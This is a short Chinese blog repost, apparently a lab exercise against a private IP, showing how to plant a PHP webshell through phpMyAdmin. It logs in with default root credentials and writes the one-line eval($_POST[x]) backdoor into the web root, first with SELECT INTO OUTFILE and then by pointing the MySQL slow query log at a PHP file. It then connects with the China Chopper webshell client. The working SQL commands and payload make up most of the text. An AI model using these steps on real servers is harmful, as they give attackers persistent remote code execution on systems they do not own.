42、利用sql语句写入shell

目标ip:192.168.52.143

一、御剑扫描该地址
在这里插入图片描述
获取到重要信息:

1、网站的绝对路径
在这里插入图片描述
2、phpmyadmin,并且是默认账号密码:root
在这里插入图片描述
二、登录数据口后台,写入一句话木马

select ‘<?php eval($_POST[x]);?>’ into outfile ‘c:/phpstudy/www/xx.php’

执行的时候报错
在这里插入图片描述

解决方法:

1、设置slow_query_log=1 启用慢查询日志。
在这里插入图片描述

2、修改slow_query_log_file日志文件的绝对路径以及文件名
set global slow_query_log_file=‘c:/phpstudy/www/xx.php’
在这里插入图片描述

3、向日志文件写入一句话
select ‘<?php eval($_POST[x]);?>’ or sleep(11)
在这里插入图片描述
三、用菜刀链接
在这里插入图片描述

禁止非法,后果自负
欢迎关注公众号:web安全工具库
在这里插入图片描述

发布了97 篇原创文章 · 获赞 4 · 访问量 7452

猜你喜欢

转载自blog.csdn.net/weixin_41489908/article/details/104284129
今日推荐